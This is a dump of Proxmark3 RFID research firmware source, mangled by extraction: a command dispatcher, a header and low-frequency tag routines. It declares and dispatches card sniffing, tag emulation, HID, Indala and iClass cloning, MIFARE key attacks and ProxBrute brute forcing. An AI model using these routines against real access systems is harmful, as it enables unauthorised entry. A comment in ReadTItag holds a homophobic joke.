#ifdef WITH_ISO14443b 1109 | case CMD_READ_SRI512_TAG: 1110 | ReadSTMemoryIso14443b(0x0F); 1111 | break; 1112 | case CMD_READ_SRIX4K_TAG: 1113 | ReadSTMemoryIso14443b(0x7F); 1114 | break; 1115 | case CMD_SNOOP_ISO_14443B: 1116 | SnoopIso14443b(); 1117 | break; 1118 | case CMD_SIMULATE_TAG_ISO_14443B: 1119 | SimulateIso14443bTag(); 1120 | break; 1121 | case CMD_ISO_14443B_COMMAND: 1122 | SendRawCommand14443B(c->arg[0],c->arg[1],c->arg[2],c->d.asBytes); 1123 | break; 1124 | #endif 1125 | 1126 | #ifdef WITH_ISO14443a 1127 | case CMD_SNOOP_ISO_14443a: 1128 | SnoopIso14443a(c->arg[0]); 1129 | break; 1130 | case CMD_READER_ISO_14443a: 1131 | ReaderIso14443a(c); 1132 | break; 1133 | case CMD_SIMULATE_TAG_ISO_14443a: 1134 | SimulateIso14443aTag(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); // ## Simulate iso14443a tag - pass tag type & UID 1135 | break; 1136 | 1137 | case CMD_EPA_PACE_COLLECT_NONCE: 1138 | EPA_PACE_Collect_Nonce(c); 1139 | break; 1140 | case CMD_EPA_PACE_REPLAY: 1141 | EPA_PACE_Replay(c); 1142 | break; 1143 | 1144 | case CMD_READER_MIFARE: 1145 | ReaderMifare(c->arg[0]); 1146 | break; 1147 | case CMD_MIFARE_READBL: 1148 | MifareReadBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1149 | break; 1150 | case CMD_MIFAREU_READBL: 1151 | MifareUReadBlock(c->arg[0],c->arg[1], c->d.asBytes); 1152 | break; 1153 | case CMD_MIFAREUC_AUTH: 1154 | MifareUC_Auth(c->arg[0],c->d.asBytes); 1155 | break; 1156 | case CMD_MIFAREU_READCARD: 1157 | MifareUReadCard(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1158 | break; 1159 | case CMD_MIFAREUC_SETPWD: 1160 | MifareUSetPwd(c->arg[0], c->d.asBytes); 1161 | break; 1162 | case CMD_MIFARE_READSC: 1163 | MifareReadSector(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1164 | break; 1165 | case CMD_MIFARE_WRITEBL: 1166 | MifareWriteBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1167 | break; 1168 | //case CMD_MIFAREU_WRITEBL_COMPAT: 1169 | //MifareUWriteBlockCompat(c->arg[0], c->d.asBytes); 1170 | //break; 1171 | case CMD_MIFAREU_WRITEBL: 1172 | MifareUWriteBlock(c->arg[0], c->arg[1], c->d.asBytes); 1173 | break; 1174 | case CMD_MIFARE_NESTED: 1175 | MifareNested(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1176 | break; 1177 | case CMD_MIFARE_CHKKEYS: 1178 | MifareChkKeys(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1179 | break; 1180 | case CMD_SIMULATE_MIFARE_CARD: 1181 | Mifare1ksim(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1182 | break; 1183 | 1184 | // emulator 1185 | case CMD_MIFARE_SET_DBGMODE: 1186 | MifareSetDbgLvl(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1187 | break; 1188 | case CMD_MIFARE_EML_MEMCLR: 1189 | MifareEMemClr(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1190 | break; 1191 | case CMD_MIFARE_EML_MEMSET: 1192 | MifareEMemSet(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1193 | break; 1194 | case CMD_MIFARE_EML_MEMGET: 1195 | MifareEMemGet(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1196 | break; 1197 | case CMD_MIFARE_EML_CARDLOAD: 1198 | MifareECardLoad(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1199 | break; 1200 | 1201 | // Work with "magic Chinese" card 1202 | case CMD_MIFARE_CSETBLOCK: 1203 | MifareCSetBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1204 | break; 1205 | case CMD_MIFARE_CGETBLOCK: 1206 | MifareCGetBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1207 | break; 1208 | case CMD_MIFARE_CIDENT: 1209 | MifareCIdent(); 1210 | break; 1211 | 1212 | // mifare sniffer 1213 | case CMD_MIFARE_SNIFFER: 1214 | SniffMifare(c->arg[0]); 1215 | break; 1216 | 1217 | #endif 1218 | 1219 | #ifdef WITH_ICLASS 1220 | // Makes use of ISO14443a FPGA Firmware 1221 | case CMD_SNOOP_ICLASS: 1222 | SnoopIClass(); 1223 | break; 1224 | case CMD_SIMULATE_TAG_ICLASS: 1225 | SimulateIClass(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1226 | break; 1227 | case CMD_READER_ICLASS: 1228 | ReaderIClass(c->arg[0]); 1229 | break; 1230 | case CMD_READER_ICLASS_REPLAY: 1231 | ReaderIClass_Replay(c->arg[0], c->d.asBytes); 1232 | break; 1233 | case CMD_ICLASS_EML_MEMSET: 1234 | emlSet(c->d.asBytes,c->arg[0], c->arg[1]); 1235 | break; 1236 | case CMD_ICLASS_WRITEBLOCK: 1237 | iClass_WriteBlock(c->arg[0], c->d.asBytes); 1238 | break; 1239 | case CMD_ICLASS_READCHECK: // auth step 1 1240 | iClass_ReadCheck(c->arg[0], c->arg[1]); 1241 | break; 1242 | case CMD_ICLASS_READBLOCK: 1243 | iClass_ReadBlk(c->arg[0]); 1244 | break; 1245 | case CMD_ICLASS_AUTHENTICATION: //check 1246 | iClass_Authentication(c->d.asBytes); 1247 | break; 1248 | case CMD_ICLASS_DUMP: 1249 | iClass_Dump(c->arg[0], c->arg[1]); 1250 | break; 1251 | case CMD_ICLASS_CLONE: 1252 | iClass_Clone(c->arg[0], c->arg[1], c->d.asBytes); 1253 | break; 1254 | #endif 1255 | #ifdef WITH_HFSNOOP 1256 | case CMD_HF_SNIFFER: 1257 | HfSnoop(c->arg[0], c->arg[1]); 1258 | break; 1259 | #endif 1260 | 1261 | case CMD_BUFF_CLEAR: 1262 | BigBuf_Clear(); 1263 | break; 1264 | 1265 | case CMD_MEASURE_ANTENNA_TUNING: 1266 | MeasureAntennaTuning(c->arg[0]); 1267 | break; 1268 | 1269 | case CMD_MEASURE_ANTENNA_TUNING_HF: 1270 | MeasureAntennaTuningHf(); 1271 | break; 1272 | 1273 | case CMD_LISTEN_READER_FIELD: 1274 | ListenReaderField(c->arg[0]); 1275 | break; 1276 | 1277 | case CMD_FPGA_MAJOR_MODE_OFF: // ## FPGA Control 1278 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 1279 | SpinDelay(200); 1280 | LED_D_OFF(); // LED D indicates field ON or OFF 1281 | break; 1282 | 1283 | case CMD_DOWNLOAD_RAW_ADC_SAMPLES_125K: 1284 | 1285 | LED_B_ON(); 1286 | uint8_t *BigBuf = BigBuf_get_addr(); 1287 | for(size_t i=0; iarg[1]; i += USB_CMD_DATA_SIZE) { 1288 | size_t len = MIN((c->arg[1] - i),USB_CMD_DATA_SIZE); 1289 | cmd_send(CMD_DOWNLOADED_RAW_ADC_SAMPLES_125K,i,len,BigBuf_get_traceLen(),BigBuf+c->arg[0]+i,len); 1290 | } 1291 | // Trigger a finish downloading signal with an ACK frame 1292 | cmd_send(CMD_ACK,1,0,BigBuf_get_traceLen(),getSamplingConfig(),sizeof(sample_config)); 1293 | LED_B_OFF(); 1294 | break; 1295 | 1296 | case CMD_DOWNLOADED_SIM_SAMPLES_125K: { 1297 | uint8_t *b = BigBuf_get_addr(); 1298 | memcpy(b+c->arg[0], c->d.asBytes, USB_CMD_DATA_SIZE); 1299 | cmd_send(CMD_ACK,0,0,0,0,0); 1300 | break; 1301 | } 1302 | case CMD_READ_MEM: 1303 | ReadMem(c->arg[0]); 1304 | break; 1305 | 1306 | case CMD_SET_LF_DIVISOR: 1307 | FpgaDownloadAndGo(FPGA_BITSTREAM_LF); 1308 | FpgaSendCommand(FPGA_CMD_SET_DIVISOR, c->arg[0]); 1309 | break; 1310 | 1311 | case CMD_SET_ADC_MUX: 1312 | switch(c->arg[0]) { 1313 | case 0: SetAdcMuxFor(GPIO_MUXSEL_LOPKD); break; 1314 | case 1: SetAdcMuxFor(GPIO_MUXSEL_LORAW); break; 1315 | case 2: SetAdcMuxFor(GPIO_MUXSEL_HIPKD); break; 1316 | case 3: SetAdcMuxFor(GPIO_MUXSEL_HIRAW); break; 1317 | } 1318 | break; 1319 | 1320 | case CMD_VERSION: 1321 | SendVersion(); 1322 | break; 1323 | case CMD_STATUS: 1324 | SendStatus(); 1325 | break; 1326 | case CMD_PING: 1327 | cmd_send(CMD_ACK,0,0,0,0,0); 1328 | break; 1329 | #ifdef WITH_LCD 1330 | case CMD_LCD_RESET: 1331 | LCDReset(); 1332 | break; 1333 | case CMD_LCD: 1334 | LCDSend(c->arg[0]); 1335 | break; 1336 | #endif 1337 | case CMD_SETUP_WRITE: 1338 | case CMD_FINISH_WRITE: 1339 | case CMD_HARDWARE_RESET: 1340 | usb_disable(); 1341 | SpinDelay(1000); 1342 | SpinDelay(1000); 1343 | AT91C_BASE_RSTC->RSTC_RCR = RST_CONTROL_KEY | AT91C_RSTC_PROCRST; 1344 | for(;;) { 1345 | // We're going to reset, and the bootrom will take control. 1346 | } 1347 | break; 1348 | 1349 | case CMD_START_FLASH: 1350 | if(common_area.flags.bootrom_present) { 1351 | common_area.command = COMMON_AREA_COMMAND_ENTER_FLASH_MODE; 1352 | } 1353 | usb_disable(); 1354 | AT91C_BASE_RSTC->RSTC_RCR = RST_CONTROL_KEY | AT91C_RSTC_PROCRST; 1355 | for(;;); 1356 | break; 1357 | 1358 | case CMD_DEVICE_INFO: { 1359 | uint32_t dev_info = DEVICE_INFO_FLAG_OSIMAGE_PRESENT | DEVICE_INFO_FLAG_CURRENT_MODE_OS; 1360 | if(common_area.flags.bootrom_present) dev_info |= DEVICE_INFO_FLAG_BOOTROM_PRESENT; 1361 | cmd_send(CMD_DEVICE_INFO,dev_info,0,0,0,0); 1362 | break; 1363 | } 1364 | default: 1365 | Dbprintf("%s: 0x%04x","unknown command:",c->cmd); 1366 | break; 1367 | } 1368 | } 1369 | 1370 | void __attribute__((noreturn)) AppMain(void) 1371 | { 1372 | SpinDelay(100); 1373 | clear_trace(); 1374 | if(common_area.magic != COMMON_AREA_MAGIC || common_area.version != 1) { 1375 | /* Initialize common area */ 1376 | memset(&common_area, 0, sizeof(common_area)); 1377 | common_area.magic = COMMON_AREA_MAGIC; 1378 | common_area.version = 1; 1379 | } 1380 | common_area.flags.osimage_present = 1; 1381 | 1382 | LED_D_OFF(); 1383 | LED_C_OFF(); 1384 | LED_B_OFF(); 1385 | LED_A_OFF(); 1386 | 1387 | // Init USB device 1388 | usb_enable(); 1389 | 1390 | // The FPGA gets its clock from us from PCK0 output, so set that up. 1391 | AT91C_BASE_PIOA->PIO_BSR = GPIO_PCK0; 1392 | AT91C_BASE_PIOA->PIO_PDR = GPIO_PCK0; 1393 | AT91C_BASE_PMC->PMC_SCER = AT91C_PMC_PCK0; 1394 | // PCK0 is PLL clock / 4 = 96Mhz / 4 = 24Mhz 1395 | AT91C_BASE_PMC->PMC_PCKR[0] = AT91C_PMC_CSS_PLL_CLK | 1396 | AT91C_PMC_PRES_CLK_4; // 4 for 24Mhz pck0, 2 for 48 MHZ pck0 1397 | AT91C_BASE_PIOA->PIO_OER = GPIO_PCK0; 1398 | 1399 | // Reset SPI 1400 | AT91C_BASE_SPI->SPI_CR = AT91C_SPI_SWRST; 1401 | // Reset SSC 1402 | AT91C_BASE_SSC->SSC_CR = AT91C_SSC_SWRST; 1403 | 1404 | // Load the FPGA image, which we have stored in our flash. 1405 | // (the HF version by default) 1406 | FpgaDownloadAndGo(FPGA_BITSTREAM_HF); 1407 | 1408 | StartTickCount(); 1409 | 1410 | #ifdef WITH_LCD 1411 | LCDInit(); 1412 | #endif 1413 | 1414 | byte_t rx[sizeof(UsbCommand)]; 1415 | size_t rx_len; 1416 | 1417 | for(;;) { 1418 | if (usb_poll()) { 1419 | rx_len = usb_read(rx,sizeof(UsbCommand)); 1420 | if (rx_len) { 1421 | UsbPacketReceived(rx,rx_len); 1422 | } 1423 | } 1424 | WDT_HIT(); 1425 | 1426 | #ifdef WITH_LF 1427 | #ifndef WITH_ISO14443a_StandAlone 1428 | if (BUTTON_HELD(1000) > 0) 1429 | SamyRun(); 1430 | #endif 1431 | #endif 1432 | #ifdef WITH_ISO14443a 1433 | #ifdef WITH_ISO14443a_StandAlone 1434 | if (BUTTON_HELD(1000) > 0) 1435 | StandAloneMode14a(); 1436 | #endif 1437 | #endif 1438 | } 1439 | } 1440 | -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/patch/files from diff/orig/armsrc/apps.h: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Jonathan Westhues, Aug 2005 3 | // Gerhard de Koning Gans, April 2008, May 2011 4 | // 5 | // This code is licensed to you under the terms of the GNU GPL, version 2 or, 6 | // at your option, any later version. See the LICENSE.txt file for the text of 7 | // the license. 8 | //----------------------------------------------------------------------------- 9 | // Definitions internal to the app source. 10 | //----------------------------------------------------------------------------- 11 | 12 | #ifndef __APPS_H 13 | #define __APPS_H 14 | 15 | #include 16 | #include 17 | #include "common.h" 18 | #include "hitag2.h" 19 | #include "hitagS.h" 20 | #include "mifare.h" 21 | #include "../common/crc32.h" 22 | #include "BigBuf.h" 23 | #include "fpgaloader.h" 24 | 25 | extern const uint8_t OddByteParity[256]; 26 | extern int rsamples; // = 0; 27 | extern int tracing; // = TRUE; 28 | extern uint8_t trigger; 29 | 30 | // This may be used (sparingly) to declare a function to be copied to 31 | // and executed from RAM 32 | #define RAMFUNC __attribute((long_call, section(".ramfunc"))) 33 | 34 | /// appmain.h 35 | void ReadMem(int addr); 36 | void __attribute__((noreturn)) AppMain(void); 37 | void SamyRun(void); 38 | //void DbpIntegers(int a, int b, int c); 39 | void DbpString(char *str); 40 | void Dbprintf(const char *fmt, ...); 41 | void Dbhexdump(int len, uint8_t *d, bool bAsci); 42 | 43 | // ADC Vref = 3300mV, and an (10M+1M):1M voltage divider on the HF input can measure voltages up to 36300 mV 44 | #define MAX_ADC_HF_VOLTAGE 36300 45 | // ADC Vref = 3300mV, and an (10000k+240k):240k voltage divider on the LF input can measure voltages up to 140800 mV 46 | #define MAX_ADC_LF_VOLTAGE 140800 47 | int AvgAdc(int ch); 48 | 49 | void ToSendStuffBit(int b); 50 | void ToSendReset(void); 51 | void ListenReaderField(int limit); 52 | extern int ToSendMax; 53 | extern uint8_t ToSend[]; 54 | 55 | 56 | /// lfops.h 57 | extern uint8_t decimation; 58 | extern uint8_t bits_per_sample ; 59 | extern bool averaging; 60 | 61 | void AcquireRawAdcSamples125k(int divisor); 62 | void ModThenAcquireRawAdcSamples125k(uint32_t delay_off, uint32_t period_0, uint32_t period_1, uint8_t *command); 63 | void ReadTItag(void); 64 | void WriteTItag(uint32_t idhi, uint32_t idlo, uint16_t crc); 65 | 66 | void AcquireTiType(void); 67 | void AcquireRawBitsTI(void); 68 | void SimulateTagLowFrequency(int period, int gap, int ledcontrol); 69 | // ProxBrute - created this function so that i didnt mess with anything 70 | // important - needed to only send a couple tags then goto next 71 | void SimulateTagLowFrequencyProxBrute(int period, int gap, int ledcontrol); 72 | void CmdHIDsimTAGProxBrute(int hi, int lo, int ledcontrol); 73 | void SimulateTagLowFrequencyBidir(int divisor, int max_bitlen); 74 | void CmdHIDsimTAG(int hi, int lo, int ledcontrol); 75 | void CmdFSKsimTAG(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); 76 | void CmdASKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); 77 | void CmdPSKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); 78 | void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol); 79 | void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol); // Realtime demodulation mode for AWID26 80 | void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol); 81 | void CmdIOdemodFSK(int findone, int *high, int *low, int ledcontrol); 82 | void CopyIOtoT55x7(uint32_t hi, uint32_t lo); // Clone an ioProx card to T5557/T5567 83 | void CopyHIDtoT55x7(uint32_t hi2, uint32_t hi, uint32_t lo, uint8_t longFMT); // Clone an HID card to T5557/T5567 84 | void CopyVikingtoT55xx(uint32_t block1, uint32_t block2, uint8_t Q5); 85 | void WriteEM410x(uint32_t card, uint32_t id_hi, uint32_t id_lo); 86 | void CopyIndala64toT55x7(uint32_t hi, uint32_t lo); // Clone Indala 64-bit tag by UID to T55x7 87 | void CopyIndala224toT55x7(uint32_t uid1, uint32_t uid2, uint32_t uid3, uint32_t uid4, uint32_t uid5, uint32_t uid6, uint32_t uid7); // Clone Indala 224-bit tag by UID to T55x7 88 | void T55xxResetRead(void); 89 | void T55xxWriteBlock(uint32_t Data, uint32_t Block, uint32_t Pwd, uint8_t PwdMode); 90 | void T55xxReadBlock(uint16_t arg0, uint8_t Block, uint32_t Pwd); 91 | void T55xxWakeUp(uint32_t Pwd); 92 | void TurnReadLFOn(); 93 | //void T55xxReadTrace(void); 94 | void EM4xReadWord(uint8_t Address, uint32_t Pwd, uint8_t PwdMode); 95 | void EM4xWriteWord(uint32_t Data, uint8_t Address, uint32_t Pwd, uint8_t PwdMode); 96 | 97 | /// iso14443.h 98 | void SimulateIso14443bTag(void); 99 | void AcquireRawAdcSamplesIso14443b(uint32_t parameter); 100 | void ReadSTMemoryIso14443b(uint32_t); 101 | void RAMFUNC SnoopIso14443b(void); 102 | void SendRawCommand14443B(uint32_t, uint32_t, uint8_t, uint8_t[]); 103 | 104 | /// iso14443a.h 105 | void RAMFUNC SnoopIso14443a(uint8_t param); 106 | void SimulateIso14443aTag(int tagType, int uid_1st, int uid_2nd, byte_t* data); 107 | void ReaderIso14443a(UsbCommand * c); 108 | // Also used in iclass.c 109 | bool RAMFUNC LogTrace(const uint8_t *btBytes, uint16_t len, uint32_t timestamp_start, uint32_t timestamp_end, uint8_t *parity, bool readerToTag); 110 | void GetParity(const uint8_t *pbtCmd, uint16_t len, uint8_t *parity); 111 | void iso14a_set_trigger(bool enable); 112 | 113 | void RAMFUNC SniffMifare(uint8_t param); 114 | 115 | /// epa.h 116 | void EPA_PACE_Collect_Nonce(UsbCommand * c); 117 | void EPA_PACE_Replay(UsbCommand *c); 118 | 119 | // mifarecmd.h 120 | void ReaderMifare(bool first_try); 121 | int32_t dist_nt(uint32_t nt1, uint32_t nt2); 122 | void MifareReadBlock(uint8_t arg0, uint8_t arg1, uint8_t arg2, uint8_t *data); 123 | void MifareUReadBlock(uint8_t arg0, uint8_t arg1, uint8_t *datain); 124 | void MifareUC_Auth(uint8_t arg0, uint8_t *datain); 125 | void MifareUReadCard(uint8_t arg0, uint16_t arg1, uint8_t arg2, uint8_t *datain); 126 | void MifareReadSector(uint8_t arg0, uint8_t arg1, uint8_t arg2, uint8_t *datain); 127 | void MifareWriteBlock(uint8_t arg0, uint8_t arg1, uint8_t arg2, uint8_t *datain); 128 | //void MifareUWriteBlockCompat(uint8_t arg0,uint8_t *datain); 129 | void MifareUWriteBlock(uint8_t arg0, uint8_t arg1, uint8_t *datain); 130 | void MifareNested(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 131 | void MifareChkKeys(uint16_t arg0, uint8_t arg1, uint8_t arg2, uint8_t *datain); 132 | void Mifare1ksim(uint8_t arg0, uint8_t arg1, uint8_t arg2, uint8_t *datain); 133 | void MifareSetDbgLvl(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 134 | void MifareEMemClr(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 135 | void MifareEMemSet(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 136 | void MifareEMemGet(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 137 | void MifareECardLoad(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 138 | void MifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); // Work with "magic Chinese" card 139 | void MifareCGetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 140 | void MifareCIdent(); // is "magic chinese" card? 141 | void MifareUSetPwd(uint8_t arg0, uint8_t *datain); 142 | 143 | //desfire 144 | void Mifare_DES_Auth1(uint8_t arg0,uint8_t *datain); 145 | void Mifare_DES_Auth2(uint32_t arg0, uint8_t *datain); 146 | 147 | // mifaredesfire.h 148 | bool InitDesfireCard(); 149 | void MifareSendCommand(uint8_t arg0,uint8_t arg1, uint8_t *datain); 150 | void MifareDesfireGetInformation(); 151 | void MifareDES_Auth1(uint8_t arg0,uint8_t arg1,uint8_t arg2, uint8_t *datain); 152 | void ReaderMifareDES(uint32_t param, uint32_t param2, uint8_t * datain); 153 | int DesfireAPDU(uint8_t *cmd, size_t cmd_len, uint8_t *dataout); 154 | size_t CreateAPDU( uint8_t *datain, size_t len, uint8_t *dataout); 155 | void OnSuccess(); 156 | void OnError(uint8_t reason); 157 | 158 | 159 | /// iso15693.h 160 | void RecordRawAdcSamplesIso15693(void); 161 | void AcquireRawAdcSamplesIso15693(void); 162 | void ReaderIso15693(uint32_t parameter); // Simulate an ISO15693 reader - greg 163 | void SimTagIso15693(uint32_t parameter, uint8_t *uid); // simulate an ISO15693 tag - greg 164 | void BruteforceIso15693Afi(uint32_t speed); // find an AFI of a tag - atrox 165 | void DirectTag15693Command(uint32_t datalen,uint32_t speed, uint32_t recv, uint8_t data[]); // send arbitrary commands from CLI - atrox 166 | void SetDebugIso15693(uint32_t flag); 167 | 168 | /// iclass.h 169 | void RAMFUNC SnoopIClass(void); 170 | void SimulateIClass(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 171 | void ReaderIClass(uint8_t arg0); 172 | void ReaderIClass_Replay(uint8_t arg0,uint8_t *MAC); 173 | void IClass_iso14443A_GetPublic(uint8_t arg0); 174 | void iClass_Authentication(uint8_t *MAC); 175 | void iClass_WriteBlock(uint8_t blockNo, uint8_t *data); 176 | void iClass_ReadBlk(uint8_t blockNo); 177 | bool iClass_ReadBlock(uint8_t blockNo, uint8_t *readdata); 178 | void iClass_Dump(uint8_t blockno, uint8_t numblks); 179 | void iClass_Clone(uint8_t startblock, uint8_t endblock, uint8_t *data); 180 | void iClass_ReadCheck(uint8_t blockNo, uint8_t keyType); 181 | 182 | // hitag2.h 183 | void SnoopHitag(uint32_t type); 184 | void SimulateHitagTag(bool tag_mem_supplied, byte_t* data); 185 | void ReaderHitag(hitag_function htf, hitag_data* htd); 186 | 187 | //hitagS.h 188 | void SimulateHitagSTag(bool tag_mem_supplied, byte_t* data); 189 | void ReadHitagS(hitag_function htf, hitag_data* htd); 190 | void WritePageHitagS(hitag_function htf, hitag_data* htd,int page); 191 | void check_challenges(bool file_given, byte_t* data); 192 | 193 | 194 | // cmd.h 195 | bool cmd_receive(UsbCommand* cmd); 196 | bool cmd_send(uint32_t cmd, uint32_t arg0, uint32_t arg1, uint32_t arg2, void* data, size_t len); 197 | 198 | /// util.h 199 | void HfSnoop(int , int); 200 | 201 | #endif 202 | -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/patch/files from diff/orig/armsrc/lfops.c: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // This code is licensed to you under the terms of the GNU GPL, version 2 or, 3 | // at your option, any later version. See the LICENSE.txt file for the text of 4 | // the license. 5 | //----------------------------------------------------------------------------- 6 | // Miscellaneous routines for low frequency tag operations. 7 | // Tags supported here so far are Texas Instruments (TI), HID 8 | // Also routines for raw mode reading/simulating of LF waveform 9 | //----------------------------------------------------------------------------- 10 | 11 | #include "proxmark3.h" 12 | #include "apps.h" 13 | #include "util.h" 14 | #include "hitag2.h" 15 | #include "crc16.h" 16 | #include "string.h" 17 | #include "lfdemod.h" 18 | #include "lfsampling.h" 19 | #include "protocols.h" 20 | #include "usb_cdc.h" // for usb_poll_validate_length 21 | 22 | /** 23 | * Function to do a modulation and then get samples. 24 | * @param delay_off 25 | * @param period_0 26 | * @param period_1 27 | * @param command 28 | */ 29 | void ModThenAcquireRawAdcSamples125k(uint32_t delay_off, uint32_t period_0, uint32_t period_1, uint8_t *command) 30 | { 31 | 32 | int divisor_used = 95; // 125 KHz 33 | // see if 'h' was specified 34 | 35 | if (command[strlen((char *) command) - 1] == 'h') 36 | divisor_used = 88; // 134.8 KHz 37 | 38 | sample_config sc = { 0,0,1, divisor_used, 0}; 39 | setSamplingConfig(&sc); 40 | //clear read buffer 41 | BigBuf_Clear_keep_EM(); 42 | 43 | /* Make sure the tag is reset */ 44 | FpgaDownloadAndGo(FPGA_BITSTREAM_LF); 45 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 46 | SpinDelay(2500); 47 | 48 | LFSetupFPGAForADC(sc.divisor, 1); 49 | 50 | // And a little more time for the tag to fully power up 51 | SpinDelay(2000); 52 | 53 | // now modulate the reader field 54 | while(*command != '\0' && *command != ' ') { 55 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 56 | LED_D_OFF(); 57 | SpinDelayUs(delay_off); 58 | FpgaSendCommand(FPGA_CMD_SET_DIVISOR, sc.divisor); 59 | 60 | FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_ADC | FPGA_LF_ADC_READER_FIELD); 61 | LED_D_ON(); 62 | if(*(command++) == '0') 63 | SpinDelayUs(period_0); 64 | else 65 | SpinDelayUs(period_1); 66 | } 67 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 68 | LED_D_OFF(); 69 | SpinDelayUs(delay_off); 70 | FpgaSendCommand(FPGA_CMD_SET_DIVISOR, sc.divisor); 71 | 72 | FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_ADC | FPGA_LF_ADC_READER_FIELD); 73 | 74 | // now do the read 75 | DoAcquisition_config(false); 76 | } 77 | 78 | /* blank r/w tag data stream 79 | ...0000000000000000 01111111 80 | 1010101010101010101010101010101010101010101010101010101010101010 81 | 0011010010100001 82 | 01111111 83 | 101010101010101[0]000... 84 | 85 | [5555fe852c5555555555555555fe0000] 86 | */ 87 | void ReadTItag(void) 88 | { 89 | // some hardcoded initial params 90 | // when we read a TI tag we sample the zerocross line at 2Mhz 91 | // TI tags modulate a 1 as 16 cycles of 123.2Khz 92 | // TI tags modulate a 0 as 16 cycles of 134.2Khz 93 | #define FSAMPLE 2000000 94 | #define FREQLO 123200 95 | #define FREQHI 134200 96 | 97 | signed char *dest = (signed char *)BigBuf_get_addr(); 98 | uint16_t n = BigBuf_max_traceLen(); 99 | // 128 bit shift register [shift3:shift2:shift1:shift0] 100 | uint32_t shift3 = 0, shift2 = 0, shift1 = 0, shift0 = 0; 101 | 102 | int i, cycles=0, samples=0; 103 | // how many sample points fit in 16 cycles of each frequency 104 | uint32_t sampleslo = (FSAMPLE<<4)/FREQLO, sampleshi = (FSAMPLE<<4)/FREQHI; 105 | // when to tell if we're close enough to one freq or another 106 | uint32_t threshold = (sampleslo - sampleshi + 1)>>1; 107 | 108 | // TI tags charge at 134.2Khz 109 | FpgaDownloadAndGo(FPGA_BITSTREAM_LF); 110 | FpgaSendCommand(FPGA_CMD_SET_DIVISOR, 88); //134.8Khz 111 | 112 | // Place FPGA in passthrough mode, in this mode the CROSS_LO line 113 | // connects to SSP_DIN and the SSP_DOUT logic level controls 114 | // whether we're modulating the antenna (high) 115 | // or listening to the antenna (low) 116 | FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_PASSTHRU); 117 | 118 | // get TI tag data into the buffer 119 | AcquireTiType(); 120 | 121 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 122 | 123 | for (i=0; i0) ) { 126 | cycles++; 127 | // after 16 cycles, measure the frequency 128 | if (cycles>15) { 129 | cycles=0; 130 | samples=i-samples; // number of samples in these 16 cycles 131 | 132 | // TI bits are coming to us lsb first so shift them 133 | // right through our 128 bit right shift register 134 | shift0 = (shift0>>1) | (shift1 << 31); 135 | shift1 = (shift1>>1) | (shift2 << 31); 136 | shift2 = (shift2>>1) | (shift3 << 31); 137 | shift3 >>= 1; 138 | 139 | // check if the cycles fall close to the number 140 | // expected for either the low or high frequency 141 | if ( (samples>(sampleslo-threshold)) && (samples<(sampleslo+threshold)) ) { 142 | // low frequency represents a 1 143 | shift3 |= (1<<31); 144 | } else if ( (samples>(sampleshi-threshold)) && (samples<(sampleshi+threshold)) ) { 145 | // high frequency represents a 0 146 | } else { 147 | // probably detected a gay waveform or noise 148 | // use this as gaydar or discard shift register and start again 149 | shift3 = shift2 = shift1 = shift0 = 0; 150 | } 151 | samples = i; 152 | 153 | // for each bit we receive, test if we've detected a valid tag 154 | 155 | // if we see 17 zeroes followed by 6 ones, we might have a tag 156 | // remember the bits are backwards 157 | if ( ((shift0 & 0x7fffff) == 0x7e0000) ) { 158 | // if start and end bytes match, we have a tag so break out of the loop 159 | if ( ((shift0>>16)&0xff) == ((shift3>>8)&0xff) ) { 160 | cycles = 0xF0B; //use this as a flag (ugly but whatever) 161 | break; 162 | } 163 | } 164 | } 165 | } 166 | } 167 | 168 | // if flag is set we have a tag 169 | if (cycles!=0xF0B) { 170 | DbpString("Info: No valid tag detected."); 171 | } else { 172 | // put 64 bit data into shift1 and shift0 173 | shift0 = (shift0>>24) | (shift1 << 8); 174 | shift1 = (shift1>>24) | (shift2 << 8); 175 | 176 | // align 16 bit crc into lower half of shift2 177 | shift2 = ((shift2>>24) | 